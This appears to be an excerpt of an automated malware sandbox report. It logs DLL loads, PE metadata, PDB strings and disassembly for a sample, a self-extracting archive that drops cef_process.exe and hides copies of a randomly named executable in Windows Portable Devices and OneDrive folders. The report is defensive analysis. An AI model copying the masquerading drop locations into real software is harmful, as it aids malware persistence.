                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                          Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                          Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeSection loaded: mscoree.dll
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeSection loaded: apphelp.dll
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeSection loaded: kernel.appcore.dll
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeSection loaded: version.dll
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeSection loaded: windows.storage.dll
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeSection loaded: wldp.dll
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeSection loaded: profapi.dll
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeSection loaded: cryptsp.dll
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeSection loaded: rsaenh.dll
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeSection loaded: cryptbase.dll
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeSection loaded: sspicli.dll
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeSection loaded: ktmw32.dll
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeSection loaded: wbemcomn.dll
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeSection loaded: amsi.dll
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeSection loaded: userenv.dll
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeSection loaded: iphlpapi.dll
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeSection loaded: dnsapi.dll
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeSection loaded: winnsi.dll
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeSection loaded: rasapi32.dll
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeSection loaded: rasman.dll
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeSection loaded: rtutils.dll
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeSection loaded: mswsock.dll
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeSection loaded: winhttp.dll
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeDirectory created: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeDirectory created: C:\Program Files\Windows Portable Devices\07a615e8f2b317Jump to behavior
                          Source: C:\RuntimeDll\cef_process.exeDirectory created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exeJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeDirectory created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\07a615e8f2b317Jump to behavior
                          Source: kBY9lgRaca.exeStatic file information: File size 3589074 > 1048576
                          Source: kBY9lgRaca.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: kBY9lgRaca.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: kBY9lgRaca.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: kBY9lgRaca.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: kBY9lgRaca.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: kBY9lgRaca.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: kBY9lgRaca.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: kBY9lgRaca.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: kBY9lgRaca.exe
                          Source: Binary string: 5c561934e089\System.pdbigab source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2765072428.000000001C846000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\dll\System.pdb source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2765072428.000000001C846000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2764819060.000000001C7C0000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\dll\System.pdb# source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2765072428.000000001C846000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: *.pdb source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2756809668.000000001BA2E000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: 7..pDb source: cef_process.exe, 00000008.00000002.1629531486.00007FFAACE40000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: .0__b77a5c561934e089\System.pdb source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2765072428.000000001C846000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.pdb source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2764819060.000000001C7C0000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.PDB source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2765072428.000000001C803000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\System.pdb_9 source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2765072428.000000001C7CA000.00000004.00000020.00020000.00000000.sdmp
                          Source: kBY9lgRaca.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                          Source: kBY9lgRaca.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                          Source: kBY9lgRaca.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                          Source: kBY9lgRaca.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                          Source: kBY9lgRaca.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeFile created: C:\RuntimeDll\__tmp_rar_sfx_access_check_4469328Jump to behavior
                          Source: kBY9lgRaca.exeStatic PE information: section name: .didat
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CCF640 push ecx; ret 0_2_00CCF653
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CCEB78 push eax; ret 0_2_00CCEB96
                          Source: C:\RuntimeDll\cef_process.exeCode function: 8_2_00007FFAACC96888 push eax; iretd 8_2_00007FFAACC96899
                          Source: C:\RuntimeDll\cef_process.exeCode function: 8_2_00007FFAACC967D4 push eax; iretd 8_2_00007FFAACC96899
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFAAC44D2A5 pushad ; iretd 9_2_00007FFAAC44D2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFAAC56B8FA push E85933D7h; ret 9_2_00007FFAAC56BAF9
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFAAC632316 push 8B485F94h; iretd 9_2_00007FFAAC63231B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFAAC46D2A5 pushad ; iretd 10_2_00007FFAAC46D2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFAAC58ADE8 push E95F03A2h; ret 10_2_00007FFAAC58AE29
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFAAC58BA7A push E85931D7h; ret 10_2_00007FFAAC58BAF9
